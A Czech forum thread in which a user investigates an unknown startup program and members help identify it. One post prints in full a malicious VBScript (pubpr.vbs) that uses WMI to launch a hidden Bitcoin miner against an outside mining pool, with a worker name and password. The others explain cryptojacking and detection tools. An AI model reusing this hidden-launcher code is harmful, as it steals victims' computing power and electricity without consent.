Diskuze: Neznámý program spouštěný při startu

Člen

Zobrazeno 22 zpráv z 22.
K personalizaci obsahu a reklam, poskytování funkcí sociálních médií a analýze naší návštěvnosti využíváme soubory cookie. Informace o tom, jak náš web používáte, sdílíme se svými partnery pro sociální média, inzerci a analýzy. Partneři tyto údaje mohou zkombinovat s dalšími informacemi, které jste jim poskytli nebo které získali v důsledku toho, že používáte jejich služby.
Používáme nezbytné cookies pro fungování webu a s tvým souhlasem také analytické a marketingové cookies.
Zajišťují základní funkce, bezpečnost a služby, které sis vyžádal. Nelze je vypnout.
| Služba | Poskytovatel | Účel | Cookies a úložiště | Doba uložení |
|---|---|---|---|---|
| ITnetwork | ITnetwork | Provoz webu, relace, přihlášení a uložení nastavení cookies. | PHPSESSID, auth_token, sid, itn_consent_impression, __Host-itn_consent | Relace až 1 rok |
| Google Tag Manager | Správa značek a načítání měřicích nástrojů webu. | Žádné | Neukládá se | |
| Google Fonts | Načítání typografie webu. | Úložiště řízené poskytovatelem | Dle podmínek poskytovatele | |
| Google Hosted Libraries | Načítání potřebných knihoven a stylů webu. | Úložiště řízené poskytovatelem | Dle podmínek poskytovatele | |
| Google reCAPTCHA | Ochrana formulářů a webu před zneužitím. | _GRECAPTCHA, rc::a, rc::b, rc::c, rc::f | Relace až 180 dní | |
| YouTube | Přehrávání vloženého video obsahu. | localStorage, IndexedDB; cookies after playback interaction | Relace až trvalé úložiště | |
| Vimeo | Vimeo | Přehrávání vloženého video obsahu. | __cf_bm, _cfuvid, vuid, localStorage, IndexedDB | Relace až 2 roky |
| Facebook Login | Meta | Přihlášení pomocí účtu třetí strany. | Úložiště řízené poskytovatelem | Relace až 1 rok |
| GoPay | GoPay | Zpracování uživatelem vyžádané platby. | Úložiště řízené poskytovatelem | Dle podmínek poskytovatele |
Pomáhají nám porozumět používání webu a zlepšovat ho.
| Služba | Poskytovatel | Účel | Cookies a úložiště | Doba uložení |
|---|---|---|---|---|
| Google Analytics 4 | Měření návštěvnosti a používání webu. | _ga, _ga_* | Až 2 roky | |
| Microsoft Clarity | Microsoft | Měření návštěvnosti a používání webu. | _clck, _clsk, _cltk | Relace až 1 rok |
Slouží k měření kampaní, personalizaci reklamy a marketingové komunikaci.
| Služba | Poskytovatel | Účel | Cookies a úložiště | Doba uložení |
|---|---|---|---|---|
| Google Ads | Měření kampaní, reklama a remarketing. | _gcl_au, _gcl_ls | Relace až 90 dní | |
| Meta Pixel | Meta | Měření kampaní, reklama a remarketing. | _fbp, _fbc, localStorage | Až 90 dní |
| Sklik | Seznam.cz | Měření kampaní, reklama a remarketing. | retargeting, sid, szn:* | Relace až trvalé úložiště |
| LinkedIn Insight | Měření kampaní, reklama a remarketing. | bcookie, li_gc, lidc, __cf_bm | Relace až 1 rok | |
| Ecomail | Ecomail.cz | Měření kampaní, reklama a remarketing. | ecmid, Úložiště řízené poskytovatelem | Dle podmínek poskytovatele |
| Atribuce kampaní ITnetwork | ITnetwork | Přiřazení návštěvy a objednávky ke kampani. | campaign_clid[*], user_session_context | Až 1 rok |


Možná by se hodilo dát sem seznam programů, co máš nainstalované. Také se podívej, kdy byl soubor vytvořen a zkus zjistit, co by za to mohlo moct. Také projeď počítač antivirem.
Ten soubor jsou printer utilitky , ktere slouzi k administraci tiskaren.
To ale neznamena, ze se za to nemuze neco vydavat. Pokud ti to nehlasi antivir, je vetsi sance ale, ze je to v poradku.
Máš tu už 149 komentářů, neříkej, že nedokážeš použít
tlačítko odpovědět...
Co jsi přesně zkoušel? A nedal jsi sem ten seznam programů.
Tak přece, nejspíš je to toto. Ve složkách SysWOW64 System32 a je to soubor pubprn.vbs.
'----------------------------------------------------------------------
' pubprn.vbs - publish printers from a non Windows 2000 server into Windows 2000 DS
'
'
' Arguments are:-
' server - format server
' DS container - format "LDAP:\\CN=...,DC=...."
'
'
' Copyright (c) Microsoft Corporation 1997
' All Rights Reserved
'----------------------------------------------------------------------
'--- Begin Error Strings ---
Dim L_PubprnUsage1_text
Dim L_PubprnUsage2_text
Dim L_PubprnUsage3_text
Dim L_PubprnUsage4_text
Dim L_PubprnUsage5_text
Dim L_PubprnUsage6_text
Dim L_GetObjectError1_text
Dim L_GetObjectError2_text
Dim L_PublishError1_text
Dim L_PublishError2_text
Dim L_PublishError3_text
Dim L_PublishSuccess1_text
L_PubprnUsage1_text = "Použití: [cscript] pubprn.vbs server ""LDAP://OU=..,DC=..."""
L_PubprnUsage2_text = " server je název serveru se systémem Windows (např.: Server) nebo název UNC tiskárny (\\Server\Tiskárna)"
L_PubprnUsage3_text = " ""LDAP://CN=...,DC=..."" je cesta DS cílového kontejneru"
L_PubprnUsage4_text = ""
L_PubprnUsage5_text = "Příklad 1: pubprn.vbs ServerA ""LDAP://CN=KontejnerA,DC=Domena,DC=Spolecnost,DC=CZ"""
L_PubprnUsage6_text = "Příklad 2: pubprn.vbs \\ServerA\Tiskárna ""LDAP://CN=KontejnerA,DC=Domena,DC=Spolecnost,DC=CZ"""
L_GetObjectError1_text = "Chyba: Cesta "
L_GetObjectError2_text = " nebyla nalezena."
L_GetObjectError3_text = "Chyba: Přístup se nezdařil."
L_PublishError1_text = "Chyba: Program Pubprn nemůže publikovat z počítače "
L_PublishError2_text = " protože v počítači je spuštěn systém Windows 2000 nebo vyšší."
L_PublishError3_text = "Publikace tiskárny se nezdařila "
L_PublishError4_text = "Chyba: "
L_PublishSuccess1_text = "Publikovaná tiskárna: "
'--- End Error Strings ---
set Args = Wscript.Arguments
if args.count < 2 then
wscript.echo L_PubprnUsage1_text
wscript.echo L_PubprnUsage2_text
wscript.echo L_PubprnUsage3_text
wscript.echo L_PubprnUsage4_text
wscript.echo L_PubprnUsage5_text
wscript.echo L_PubprnUsage6_text
wscript.quit(1)
end if
ServerName= args(0)
Container = args(1)
on error resume next
Set PQContainer = GetObject(Container)
if err then
wscript.echo L_GetObjectError1_text & Container & L_GetObjectError2_text
wscript.quit(1)
end if
on error goto 0
if left(ServerName,1) = "\" then
PublishPrinter ServerName, ServerName, Container
else
on error resume next
Set PrintServer = GetObject("WinNT://" & ServerName & ",computer")
if err then
wscript.echo L_GetObjectError3_text & ServerName & ": " & err.Description
wscript.quit(1)
end if
on error goto 0
For Each Printer In PrintServer
if Printer.class = "PrintQueue" then PublishPrinter Printer.PrinterPath, ServerName, Container
Next
end if
sub PublishPrinter(UNC, ServerName, Container)
Set PQ = WScript.CreateObject("OlePrn.DSPrintQueue.1")
PQ.UNCName = UNC
PQ.Container = Container
on error resume next
PQ.Publish(2)
if err then
if err.number = -2147024772 then
wscript.echo L_PublishError1_text & Chr(34) & ServerName & Chr(34) & L_PublishError2_text
wscript.quit(1)
else
wscript.echo L_PublishError3_text & Chr(34) & UNC & Chr(34) & "."
wscript.echo L_PublishError4_text & err.Description
end if
else
wscript.echo L_PublishSuccess1_text & PQ.Path
end if
Set PQ = nothing
end sub
Je tam asi 4x.
Kdybych sem měl dát seznam všech programů co mám v pc tak bych u toho
ztrávil tejden
.
Za "Odpovědět" se omlouvám, ale nějakej pátek sem tu nebyl. 
Tak jsem se podíval ještě jednou a je tam jeden co se jmenuje pubpr.vbs
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\Windows\Inf\MSASGui.exe -o http://mint.bitminter.com:8332 -u daryl001_wrk003 -p hujavez111", null, objConfig, intProcessID)
Co to dělá?
Jo todle uz skutecne malware je xD Tamto je 1:1 MS script.
Pouzivej odpovedet!
Bitcoin miner, zjednoduse receno, vyuziva pocetni vykon pocitace, provadi
vypocty a uzivatel za to dostava zaplaceno.
Problem je, ze zisky sou hodne maly a aby se ti to vyplatilo, potrebujes mit
hodne vykonneho HW. Takze je lepsi napsat virus, ktery vyuzije vykon ciziho
pocitace, sezere cizi elektrinu, ten rozsirit a tobe pak jdou jenom zisky.
Takze jestli si mel dojem, ze mas posledni dobou nejaky pomaly pocitac, tak
vykon se ztracel do penezenky nejakeho hackera.
No to jsem taky četl, ale počítač o moc pomalejší nebyl. A žádný neznámý proces zatěžující procesor jsem nepozoroval.
Miner obvykle zatezuje hlavne GPU a aby si ho uzivatel nevsiml, tak se obvykle spousti az po chvilkove necinnosti uzivatele (treba po 30 sekundach neaktivity a jakmile pohnes mysi nebo neco udelas, tak se zase zastavi, abys o nem nevedel).
Aha, to by vysvětlovalo proč se počítač přehříval a proč mi stále jel jeden program na nvidii. Díky za objasnění. Je možné že se soubor obnoví z jiného zdroje co antivirus nenašel? Jak lze dále pátrat kromě použití antiviru?
msconfig + process explorer, s tím většinu běžných virů odhalíš
ještě ten miner - potkal jsem i verze, co se při zobrazení správce úloh taky pauzovaly, aby bylo těžší je odhalit
A jen při zobrazení nebo i při spuštění a shození na lištu? Stejně bych si ho nevšiml protože zatížení grafiky tam nevidím.
I na liště tuším. Ono pokud vytěžuje grafiku, tak bude i někde nahořejc mezi těma, co vytěžujou procesor, obvykle to pár procent sežere.
Zdá se mi to, nebo ten skript obsahuje i jméno + heslo toho minera?
Asi to je jenom vytvořenej účet pro mining, kde nejde změnit heslo,
takhle blbej by snad nebyl 
Zobrazeno 22 zpráv z 22.